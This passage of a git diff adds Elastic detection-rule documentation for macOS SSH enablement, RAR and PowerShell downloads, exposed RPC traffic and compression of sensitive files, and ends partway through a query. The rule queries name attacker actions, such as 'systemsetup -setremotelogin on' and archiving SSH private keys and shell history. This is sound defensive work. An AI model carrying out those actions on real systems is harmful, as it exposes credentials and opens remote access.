Sub-technique: +** Name: Rundll32 +** ID: T1218.011 +** Reference URL: https://attack.mitre.org/techniques/T1218/011/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-remote-ssh-login-enabled-via-systemsetup-command.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-remote-ssh-login-enabled-via-systemsetup-command.asciidoc new file mode 100644 index 0000000000..15721394b4 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-remote-ssh-login-enabled-via-systemsetup-command.asciidoc @@ -0,0 +1,178 @@ +[[prebuilt-rule-8-19-32-remote-ssh-login-enabled-via-systemsetup-command]] +=== Remote SSH Login Enabled via systemsetup Command + +Detects use of the systemsetup command to enable remote SSH Login. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://documents.trendmicro.com/assets/pdf/XCSSET_Technical_Brief.pdf +* https://ss64.com/osx/systemsetup.html +* https://support.apple.com/guide/remote-desktop/about-systemsetup-apd95406b8d/mac + +*Tags*: + +* Domain: Endpoint +* OS: macOS +* Use Case: Threat Detection +* Tactic: Lateral Movement +* Data Source: Elastic Defend +* Resources: Investigation Guide + +*Version*: 113 + +*Rule authors*: + +* Elastic +* Massimo Bertocchi + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating Remote SSH Login Enabled via systemsetup Command* + + +The `systemsetup` command in macOS is a utility that allows administrators to configure system settings, including enabling remote SSH login, which facilitates remote management and access. Adversaries may exploit this to gain unauthorized access and move laterally within a network. The detection rule identifies suspicious use of `systemsetup` to enable SSH, excluding legitimate administrative tools, by monitoring process execution patterns and arguments. + + +*Possible investigation steps* + + +- Review the process execution details to confirm the use of the systemsetup command with the arguments "-setremotelogin" and "on" to ensure the alert is not a false positive. +- Check the parent process of the systemsetup command to identify if it was executed by a known administrative tool or script, excluding /usr/local/jamf/bin/jamf as per the rule. +- Investigate the user account associated with the process execution to determine if it is a legitimate administrator or a potentially compromised account. +- Examine recent login events and SSH access logs on the host to identify any unauthorized access attempts or successful logins following the enabling of remote SSH login. +- Correlate this event with other security alerts or logs from the same host or network segment to identify potential lateral movement or further malicious activity. + + +*False positive analysis* + + +- Legitimate administrative tools like Jamf may trigger this rule when enabling SSH for authorized management purposes. To handle this, ensure that the process parent executable path for Jamf is correctly excluded in the detection rule. +- Automated scripts used for system configuration and maintenance might enable SSH as part of their routine operations. Review these scripts and, if verified as safe, add their parent process paths to the exclusion list. +- IT support activities that require temporary SSH access for troubleshooting can also cause false positives. Document these activities and consider scheduling them during known maintenance windows to reduce alerts. +- Security software or management tools that periodically check or modify system settings could inadvertently trigger this rule. Identify these tools and exclude their specific process paths if they are confirmed to be non-threatening. + + +*Response and remediation* + + +- Immediately isolate the affected macOS system from the network to prevent further unauthorized access or lateral movement. +- Terminate any suspicious or unauthorized SSH sessions that are currently active on the affected system. +- Review and revoke any unauthorized SSH keys or credentials that may have been added to the system. +- Conduct a thorough examination of the system logs to identify any additional unauthorized activities or changes made by the adversary. +- Restore the system to a known good state from a backup taken before the unauthorized SSH access was enabled, if possible. +- Implement network segmentation to limit SSH access to only trusted administrative systems and users. +- Escalate the incident to the security operations team for further investigation and to determine if additional systems have been compromised. + +==== Setup + + + +*Setup* + + +This rule requires data coming in from Elastic Defend. + + +*Elastic Defend Integration Setup* + +Elastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app. + + +*Prerequisite Requirements:* + +- Fleet is required for Elastic Defend. +- To configure Fleet Server refer to the https://www.elastic.co/guide/en/fleet/current/fleet-server.html[documentation]. + + +*The following steps should be executed in order to add the Elastic Defend integration on a macOS System:* + +- Go to the Kibana home page and click "Add integrations". +- In the query bar, search for "Elastic Defend" and select the integration to see more details about it. +- Click "Add Elastic Defend". +- Configure the integration name and optionally add a description. +- Select the type of environment you want to protect, for MacOS it is recommended to select "Traditional Endpoints". +- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html[Helper guide]. +- We suggest selecting "Complete EDR (Endpoint Detection and Response)" as a configuration setting, that provides "All events; all preventions" +- Enter a name for the agent policy in "New agent policy name". If other agent policies already exist, you can click the "Existing hosts" tab and select an existing policy instead. +For more details on Elastic Agent configuration settings, refer to the https://www.elastic.co/guide/en/fleet/current/agent-policy.html[helper guide]. +- Click "Save and Continue". +- To complete the integration, select "Add Elastic Agent to your hosts" and continue to the next section to install the Elastic Agent on your hosts. +For more details on Elastic Defend refer to the https://www.elastic.co/guide/en/security/current/install-endpoint.html[helper guide]. + + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "macos" and event.type in ("start", "process_started") and +( + ( + process.name == "systemsetup" and + process.args like~ "-setremotelogin" and + process.args like~ "on" + ) or + ( + process.name == "launchctl" and + process.args in ("load", "bootstrap") and + ( + process.command_line like~ "*/System/Library/LaunchDaemons/ssh.plist*" or + process.command_line like~ "*com.openssh.sshd*" + ) + ) +) and +process.parent.executable != null and +not process.parent.executable like ("/usr/local/jamf/bin/jamf", "/usr/libexec/xpcproxy", "/usr/bin/sudo") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Lateral Movement +** ID: TA0008 +** Reference URL: https://attack.mitre.org/tactics/TA0008/ +* Technique: +** Name: Remote Services +** ID: T1021 +** Reference URL: https://attack.mitre.org/techniques/T1021/ +* Sub-technique: +** Name: SSH +** ID: T1021.004 +** Reference URL: https://attack.mitre.org/techniques/T1021/004/ +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: External Remote Services +** ID: T1133 +** Reference URL: https://attack.mitre.org/techniques/T1133/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-roshal-archive-rar-or-powershell-file-downloaded-from-the-internet.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-roshal-archive-rar-or-powershell-file-downloaded-from-the-internet.asciidoc new file mode 100644 index 0000000000..d84e557904 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-roshal-archive-rar-or-powershell-file-downloaded-from-the-internet.asciidoc @@ -0,0 +1,160 @@ +[[prebuilt-rule-8-19-32-roshal-archive-rar-or-powershell-file-downloaded-from-the-internet]] +=== Roshal Archive (RAR) or PowerShell File Downloaded from the Internet + +Detects a Roshal Archive (RAR) file or PowerShell script downloaded from the internet by an internal host. Gaining initial access to a system and then downloading encoded or encrypted tools to move laterally is a common practice for adversaries as a way to protect their more valuable tools and tactics, techniques, and procedures (TTPs). This may be atypical behavior for a managed network and can be indicative of malware, exfiltration, or command and control. + +*Rule type*: query + +*Rule indices*: + +* packetbeat-* +* auditbeat-* +* filebeat-* +* logs-network_traffic.* +* logs-panw.panos* +* logs-fortinet_fortigate.log-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html +* https://www.justice.gov/opa/press-release/file/1084361/download +* https://www.iana.org/assignments/iana-ipv4-special-registry/iana-ipv4-special-registry.xhtml + +*Tags*: + +* Use Case: Threat Detection +* Tactic: Command and Control +* Domain: Endpoint +* Data Source: Fortinet +* Data Source: PAN-OS +* Resources: Investigation Guide + +*Version*: 109 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating Roshal Archive (RAR) or PowerShell File Downloaded from the Internet* + + +RAR files and PowerShell scripts are powerful tools in IT environments, used for data compression and task automation, respectively. However, adversaries exploit these for malicious purposes, such as downloading encrypted tools to evade detection. The detection rule identifies unusual downloads of these files from external sources, flagging potential threats by monitoring network traffic and excluding trusted internal IP ranges. + + +*Possible investigation steps* + + +- Review the network traffic logs to identify the internal host that initiated the download, focusing on the source IP addresses within the ranges 10.0.0.0/8, 172.16.0.0/12, or 192.168.0.0/16. +- Examine the destination IP address of the download to determine if it is associated with known malicious activity or if it is an unusual external IP not typically accessed by the organization. +- Analyze the downloaded file's URL extension or path to confirm if it matches .ps1 or .rar, and assess whether this is expected behavior for the identified host or user. +- Check the internal host's recent activity for any signs of lateral movement or further suspicious downloads, which could indicate a broader compromise. +- Investigate the user account associated with the internal host to verify if the download aligns with their typical usage patterns and permissions. +- Utilize threat intelligence sources to gather additional context on the downloaded file or the external IP address to assess potential risks or known threats. + + +*False positive analysis* + + +- Internal software updates or legitimate administrative scripts may trigger the rule. To manage this, create exceptions for known internal update servers or trusted administrative IP addresses. +- Automated backup processes that use RAR files for compression can be mistaken for threats. Exclude IP addresses or domains associated with these backup services from the rule. +- Development environments often download scripts for testing purposes. Identify and exclude IP ranges or specific hosts associated with development activities to prevent false positives. +- Security tools that download threat intelligence or updates in RAR format might be flagged. Whitelist the IP addresses of these security tools to avoid unnecessary alerts. +- Regularly review and update the list of trusted internal IP ranges to ensure that legitimate traffic is not incorrectly flagged as suspicious. + + +*Response and remediation* + + +- Isolate the affected host from the network immediately to prevent further lateral movement or data exfiltration. +- Conduct a thorough scan of the isolated host using updated antivirus and anti-malware tools to identify and remove any malicious files or scripts. +- Review and analyze network logs to identify any other potentially compromised systems or unusual outbound connections that may indicate further compromise. +- Reset credentials and access tokens for the affected host and any other systems that may have been accessed using the compromised host. +- Restore the affected system from a known good backup if malware removal is not feasible or if the system's integrity is in question. +- Implement network segmentation to limit the ability of threats to move laterally within the network in the future. +- Escalate the incident to the security operations center (SOC) or incident response team for further investigation and to ensure comprehensive remediation and recovery efforts. + + +*Threat intel* + + +This activity has been observed in FIN7 campaigns. + +==== Rule query + + +[source, js] +---------------------------------- +(data_stream.dataset: (network_traffic.http or network_traffic.tls or fortinet_fortigate.log) or + (data_stream.dataset: panw.panos and network.application: "web-browsing") or + (event.category: (network or network_traffic) and network.protocol: http)) and + (url.extension:(ps1 or rar) or url.path:(*.ps1 or *.rar)) and + not destination.ip:( + 10.0.0.0/8 or + 127.0.0.0/8 or + 169.254.0.0/16 or + 172.16.0.0/12 or + 192.0.0.0/24 or + 192.0.0.0/29 or + 192.0.0.8/32 or + 192.0.0.9/32 or + 192.0.0.10/32 or + 192.0.0.170/32 or + 192.0.0.171/32 or + 192.0.2.0/24 or + 192.31.196.0/24 or + 192.52.193.0/24 or + 192.168.0.0/16 or + 192.88.99.0/24 or + 224.0.0.0/4 or + 100.64.0.0/10 or + 192.175.48.0/24 or + 198.18.0.0/15 or + 198.51.100.0/24 or + 203.0.113.0/24 or + 240.0.0.0/4 or + "::1" or + "FE80::/10" or + "FF00::/8" + ) and + source.ip:( + 10.0.0.0/8 or + 172.16.0.0/12 or + 192.168.0.0/16 + ) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Command and Control +** ID: TA0011 +** Reference URL: https://attack.mitre.org/tactics/TA0011/ +* Technique: +** Name: Ingress Tool Transfer +** ID: T1105 +** Reference URL: https://attack.mitre.org/techniques/T1105/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-rpc-remote-procedure-call-from-the-internet.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-rpc-remote-procedure-call-from-the-internet.asciidoc new file mode 100644 index 0000000000..33f0ed39f8 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-rpc-remote-procedure-call-from-the-internet.asciidoc @@ -0,0 +1,158 @@ +[[prebuilt-rule-8-19-32-rpc-remote-procedure-call-from-the-internet]] +=== RPC (Remote Procedure Call) from the Internet + +This rule detects network events that may indicate the use of RPC traffic from the Internet. RPC is commonly used by system administrators to remotely control a system for maintenance or to use shared resources. It should almost never be directly exposed to the Internet, as it is frequently targeted and exploited by threat actors as an initial access or backdoor vector. + +*Rule type*: query + +*Rule indices*: + +* logs-network_traffic.* +* logs-panw.panos* +* logs-fortinet_fortigate.log-* +* logs-pfsense.log-* +* logs-zeek.* +* logs-corelight.* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.iana.org/assignments/iana-ipv4-special-registry/iana-ipv4-special-registry.xhtml + +*Tags*: + +* Tactic: Initial Access +* Domain: Endpoint +* Use Case: Threat Detection +* Data Source: Corelight +* Data Source: Fortinet +* Data Source: Network Traffic +* Data Source: PAN-OS +* Data Source: pfSense +* Data Source: Zeek +* Resources: Investigation Guide + +*Version*: 113 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating RPC (Remote Procedure Call) from the Internet* + + +RPC enables remote management and resource sharing, crucial for system administration. However, when exposed to the Internet, it becomes a target for attackers seeking initial access or backdoor entry. The detection rule identifies suspicious RPC traffic by monitoring TCP port 135 and filtering out internal IP addresses, flagging potential threats from external sources. + + +*Possible investigation steps* + + +- Review the source IP address of the alert to determine if it is from a known malicious actor or if it has been flagged in previous incidents. +- Check the destination IP address to confirm it belongs to a critical internal system that should not be exposed to the Internet. +- Analyze network traffic logs to identify any unusual patterns or volumes of traffic associated with the source IP, focusing on TCP port 135. +- Investigate any related alerts or logs from the same source IP or destination IP to identify potential patterns or repeated attempts. +- Assess the potential impact on the affected system by determining if any unauthorized access or changes have occurred. +- Consult threat intelligence sources to gather additional context on the source IP or any related indicators of compromise. + + +*False positive analysis* + + +- Internal testing or development environments may generate RPC traffic that appears to originate from external sources. To manage this, add the IP addresses of these environments to the exception list in the detection rule. +- Legitimate remote management activities by trusted third-party vendors could trigger the rule. Verify the IP addresses of these vendors and include them in the exception list if they are known and authorized. +- Misconfigured network devices or proxies might route internal RPC traffic through external IP addresses. Review network configurations to ensure proper routing and add any necessary exceptions for known devices. +- Cloud-based services or applications that use RPC for legitimate purposes might be flagged. Identify these services and adjust the rule to exclude their IP ranges if they are verified as non-threatening. + + +*Response and remediation* + + +- Immediately isolate the affected system from the network to prevent further unauthorized access or lateral movement by the attacker. +- Conduct a thorough examination of the system logs and network traffic to identify any unauthorized access or data exfiltration attempts. +- Apply the latest security patches and updates to the affected system to address any vulnerabilities that may have been exploited. +- Change all administrative and user credentials on the affected system and any other systems that may have been accessed using the same credentials. +- Implement network segmentation to limit the exposure of critical systems and services, ensuring that RPC services are not accessible from the Internet. +- Monitor the network for any signs of re-infection or further suspicious activity, focusing on traffic patterns similar to those identified in the initial alert. +- Escalate the incident to the security operations center (SOC) or relevant cybersecurity team for further investigation and to determine if additional systems are compromised. + +==== Rule query + + +[source, js] +---------------------------------- +(data_stream.dataset:(fortinet_fortigate.log or network_traffic.flow) or event.category:(network or network_traffic)) and + network.transport:tcp and (destination.port:135 or data_stream.dataset:zeek.dce_rpc) and + not (event.type: denied or event.action: flow_dropped or event.outcome: failure) and + not source.ip:( + 10.0.0.0/8 or + 127.0.0.0/8 or + 169.254.0.0/16 or + 172.16.0.0/12 or + 192.0.0.0/24 or + 192.0.0.0/29 or + 192.0.0.8/32 or + 192.0.0.9/32 or + 192.0.0.10/32 or + 192.0.0.170/32 or + 192.0.0.171/32 or + 192.0.2.0/24 or + 192.31.196.0/24 or + 192.52.193.0/24 or + 192.168.0.0/16 or + 192.88.99.0/24 or + 224.0.0.0/4 or + 100.64.0.0/10 or + 192.175.48.0/24 or + 198.18.0.0/15 or + 198.51.100.0/24 or + 203.0.113.0/24 or + 240.0.0.0/4 or + "::1" or + "FE80::/10" or + "FF00::/8" + ) and + destination.ip:( + 10.0.0.0/8 or + 172.16.0.0/12 or + 192.168.0.0/16 + ) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Initial Access +** ID: TA0001 +** Reference URL: https://attack.mitre.org/tactics/TA0001/ +* Technique: +** Name: External Remote Services +** ID: T1133 +** Reference URL: https://attack.mitre.org/techniques/T1133/ +* Technique: +** Name: Exploit Public-Facing Application +** ID: T1190 +** Reference URL: https://attack.mitre.org/techniques/T1190/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-rpc-remote-procedure-call-to-the-internet.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-rpc-remote-procedure-call-to-the-internet.asciidoc new file mode 100644 index 0000000000..e760884a96 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-rpc-remote-procedure-call-to-the-internet.asciidoc @@ -0,0 +1,166 @@ +[[prebuilt-rule-8-19-32-rpc-remote-procedure-call-to-the-internet]] +=== RPC (Remote Procedure Call) to the Internet + +This rule detects network events that may indicate the use of RPC traffic to the Internet. RPC is commonly used by system administrators to remotely control a system for maintenance or to use shared resources. It should almost never be directly exposed to the Internet, as it is frequently targeted and exploited by threat actors as an initial access or backdoor vector. + +*Rule type*: query + +*Rule indices*: + +* logs-network_traffic.* +* logs-panw.panos* +* logs-fortinet_fortigate.log-* +* logs-pfsense.log-* +* logs-zeek.* +* logs-corelight.* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.iana.org/assignments/iana-ipv4-special-registry/iana-ipv4-special-registry.xhtml + +*Tags*: + +* Tactic: Initial Access +* Tactic: Lateral Movement +* Domain: Endpoint +* Use Case: Threat Detection +* Data Source: Corelight +* Data Source: Fortinet +* Data Source: PAN-OS +* Data Source: Network Traffic +* Data Source: pfSense +* Data Source: Zeek +* Resources: Investigation Guide + +*Version*: 112 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating RPC (Remote Procedure Call) to the Internet* + + +RPC enables remote management and resource sharing across networks, crucial for system administration. However, when exposed to the Internet, it becomes a target for attackers seeking initial access or backdoor entry. The detection rule identifies suspicious RPC traffic from internal IPs to external networks, flagging potential exploitation attempts by monitoring specific ports and IP ranges. + + +*Possible investigation steps* + + +- Review the source IP address from the alert to identify the internal system initiating the RPC traffic. Check if this IP belongs to a known or authorized device within the network. +- Examine the destination IP address to determine if it is a known or suspicious external entity. Use threat intelligence sources to assess if the IP has been associated with malicious activity. +- Analyze the network traffic logs for the specific event.dataset values (network_traffic.flow or zeek.dce_rpc) to gather more context about the nature and volume of the RPC traffic. +- Investigate the destination port, specifically port 135, to confirm if the traffic is indeed RPC-related and assess if there are any legitimate reasons for this communication. +- Check for any recent changes or anomalies in the network configuration or system settings of the source IP that might explain the unexpected RPC traffic. +- Correlate this alert with other security events or logs to identify any patterns or additional indicators of compromise that might suggest a broader attack campaign. + + +*False positive analysis* + + +- Internal testing environments may generate RPC traffic to external IPs for legitimate purposes. Identify and document these environments, then create exceptions in the detection rule to prevent unnecessary alerts. +- Cloud-based services or applications that require RPC communication for integration or management might trigger false positives. Review these services and whitelist their IP addresses if they are verified as non-threatening. +- VPN or remote access solutions that use RPC for secure connections can be mistaken for suspicious activity. Ensure that the IP ranges of these solutions are excluded from the rule to avoid false alerts. +- Automated backup or synchronization tools that use RPC to communicate with external servers could be flagged. Verify these tools and add their destination IPs to an exception list if they are part of routine operations. + + +*Response and remediation* + + +- Immediately isolate the affected system from the network to prevent further unauthorized access or data exfiltration. +- Conduct a thorough analysis of the affected system to identify any unauthorized changes or installed backdoors, focusing on processes and services related to RPC. +- Revoke any compromised credentials and enforce a password reset for all accounts that may have been accessed or used during the incident. +- Apply necessary patches and updates to the affected system and any other systems with similar vulnerabilities to mitigate the risk of exploitation. +- Monitor network traffic for any signs of lateral movement or additional suspicious activity, particularly focusing on RPC-related traffic. +- Escalate the incident to the security operations center (SOC) or incident response team for further investigation and to determine if additional systems are affected. +- Implement enhanced logging and monitoring for RPC traffic to detect and respond to similar threats more effectively in the future. + +==== Rule query + + +[source, js] +---------------------------------- +(data_stream.dataset:(fortinet_fortigate.log or network_traffic.flow) or event.category:(network or network_traffic)) and + network.transport:tcp and (destination.port:135 or data_stream.dataset:zeek.dce_rpc) and + source.ip:( + 10.0.0.0/8 or + 172.16.0.0/12 or + 192.168.0.0/16 + ) and + not destination.ip:( + 10.0.0.0/8 or + 127.0.0.0/8 or + 169.254.0.0/16 or + 172.16.0.0/12 or + 192.0.0.0/24 or + 192.0.0.0/29 or + 192.0.0.8/32 or + 192.0.0.9/32 or + 192.0.0.10/32 or + 192.0.0.170/32 or + 192.0.0.171/32 or + 192.0.2.0/24 or + 192.31.196.0/24 or + 192.52.193.0/24 or + 192.168.0.0/16 or + 192.88.99.0/24 or + 224.0.0.0/4 or + 100.64.0.0/10 or + 192.175.48.0/24 or + 198.18.0.0/15 or + 198.51.100.0/24 or + 203.0.113.0/24 or + 240.0.0.0/4 or + "::1" or + "FE80::/10" or + "FF00::/8" + ) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Initial Access +** ID: TA0001 +** Reference URL: https://attack.mitre.org/tactics/TA0001/ +* Technique: +** Name: Exploit Public-Facing Application +** ID: T1190 +** Reference URL: https://attack.mitre.org/techniques/T1190/ +* Tactic: +** Name: Lateral Movement +** ID: TA0008 +** Reference URL: https://attack.mitre.org/tactics/TA0008/ +* Technique: +** Name: Remote Services +** ID: T1021 +** Reference URL: https://attack.mitre.org/techniques/T1021/ +* Sub-technique: +** Name: Distributed Component Object Model +** ID: T1021.003 +** Reference URL: https://attack.mitre.org/techniques/T1021/003/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-sensitive-files-compression.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-sensitive-files-compression.asciidoc new file mode 100644 index 0000000000..fc2d393f0a --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-32/prebuilt-rule-8-19-32-sensitive-files-compression.asciidoc @@ -0,0 +1,232 @@ +[[prebuilt-rule-8-19-32-sensitive-files-compression]] +=== Sensitive Files Compression + +Identifies the use of a compression utility to collect known files containing sensitive information, such as credentials and system configurations. + +*Rule type*: new_terms + +*Rule indices*: + +* auditbeat-* +* endgame-* +* logs-auditd_manager.auditd-* +* logs-endpoint.events.process* +* logs-sentinel_one_cloud_funnel.* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.trendmicro.com/en_ca/research/20/l/teamtnt-now-deploying-ddos-capable-irc-bot-tntbotinger.html + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Collection +* Tactic: Credential Access +* Data Source: Elastic Endgame +* Data Source: Elastic Defend +* Data Source: SentinelOne +* Data Source: Auditd Manager +* Resources: Investigation Guide + +*Version*: 216 + +*Rule authors*: + +* Elastic +* Massimo Bertocchi + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating Sensitive Files Compression* + + +Compression utilities like zip, tar, and gzip are essential for efficiently managing and transferring files. However, adversaries can exploit these tools to compress and exfiltrate sensitive data, such as SSH keys and configuration files. The detection rule identifies suspicious compression activities by monitoring process executions involving these utilities and targeting known sensitive file paths, thereby flagging potential data collection and credential access attempts. + + +*Possible investigation steps* + + +- Review the process execution details to identify the user account associated with the compression activity, focusing on the process.name and process.args fields. +- Examine the command line arguments (process.args) to determine which specific sensitive files were targeted for compression. +- Check the event.timestamp to establish a timeline and correlate with other potentially suspicious activities on the host. +- Investigate the host's recent login history and user activity to identify any unauthorized access attempts or anomalies. +- Analyze network logs for any outbound connections from the host around the time of the event to detect potential data exfiltration attempts. +- Assess the integrity and permissions of the sensitive files involved to determine if they have been altered or accessed inappropriately. + + +*False positive analysis* + + +- Routine system backups or administrative tasks may trigger the rule if they involve compressing sensitive files for legitimate purposes. Users can create exceptions for known backup scripts or administrative processes by excluding specific process names or command-line arguments associated with these tasks. +- Developers or system administrators might compress configuration files during development or deployment processes. To handle this, users can whitelist specific user accounts or directories commonly used for development activities, ensuring these actions are not flagged as suspicious. +- Automated scripts or cron jobs that regularly archive logs or configuration files could be mistakenly identified as threats. Users should review and exclude these scheduled tasks by identifying their unique process identifiers or execution patterns. +- Security tools or monitoring solutions that periodically compress and transfer logs for analysis might be misinterpreted as malicious. Users can exclude these tools by specifying their process names or paths in the detection rule exceptions. + + +*Response and remediation* + + +- Immediately isolate the affected system from the network to prevent further data exfiltration and unauthorized access. +- Terminate any suspicious processes identified by the detection rule to halt ongoing compression and potential data exfiltration activities. +- Conduct a thorough review of the compressed files and their contents to assess the extent of sensitive data exposure and determine if any data has been exfiltrated. +- Change all credentials associated with the compromised files, such as SSH keys and AWS credentials, to prevent unauthorized access using stolen credentials. +- Restore any altered or deleted configuration files from a known good backup to ensure system integrity and functionality. +- Escalate the incident to the security operations center (SOC) or incident response team for further investigation and to determine if additional systems are affected. +- Implement enhanced monitoring and logging for compression utilities and sensitive file access to detect and respond to similar threats more effectively in the future. + +==== Setup + + + +*Setup* + + +This rule requires data coming in from one of the following integrations: +- Elastic Defend +- Auditbeat + + + +*Elastic Defend Integration Setup* + +Elastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows +the Elastic Agent to monitor events on your host and send data to the Elastic Security app. + + +*Prerequisite Requirements:* + +- Fleet is required for Elastic Defend. +- To configure Fleet Server refer to the https://www.elastic.co/guide/en/fleet/current/fleet-server.html[documentation]. + + +*The following steps should be executed in order to add the Elastic Defend integration on a Linux System:* + +- Go to the Kibana home page and click "Add integrations". +- In the query bar, search for "Elastic Defend" and select the integration to see more details about it. +- Click "Add Elastic Defend". +- Configure the integration name and optionally add a description. +- Select the type of environment you want to protect, either "Traditional Endpoints" or "Cloud Workloads". +- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html[Helper guide]. +- We suggest to select "Complete EDR (Endpoint Detection and Response)" as a configuration setting, that provides "All events; all preventions" +- Enter a name for the agent policy in "New agent policy name". If other agent policies already exist, you can click the "Existing hosts" tab and select an existing policy instead. +For more details on Elastic Agent configuration settings, refer to the https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html[helper guide]. +- Click "Save and Continue". +- To complete the integration, select "Add Elastic Agent to your hosts" and continue to the next section to install the Elastic Agent on your hosts. +For more details on Elastic Defend refer to the https://www.elastic.co/guide/en/security/current/install-endpoint.html[helper guide]. + + +*Auditbeat Setup* + +Auditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations. + + +*The following steps should be executed in order to add the Auditbeat on a Linux System:* + +- Elastic provides repositories available for APT and YUM-based distributions. Note that we provide binary packages, but no source packages. +- To install the APT and YUM repositories follow the setup instructions in this https://www.elastic.co/guide/en/beats/auditbeat/current/setup-repositories.html[helper guide]. +- To run Auditbeat on Docker follow the setup instructions in the https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-docker.html[helper guide]. +- To run Auditbeat on Kubernetes follow the setup instructions in the https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-kubernetes.html[helper guide]. +- For complete “Setup and Run Auditbeat” information refer to the https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html[helper guide]. + + +==== Rule query + + +[source, js] +---------------------------------- +event.category:process and host.os.type:linux and event.type:start and +event.action:("exec" or "exec_event" or "start" or "executed" or "process_started") and +process.name:(zip or tar or gzip or hdiutil or 7z) and +process.args: + ( + /root/.ssh/id_rsa or + /root/.ssh/id_rsa.pub or + /root/.ssh/id_ed25519 or + /root/.ssh/id_ed25519.pub or + /root/.ssh/authorized_keys or + /root/.ssh/authorized_keys2 or + /root/.ssh/known_hosts or + /root/.bash_history or + /etc/hosts or + /home/*/.ssh/id_rsa or + 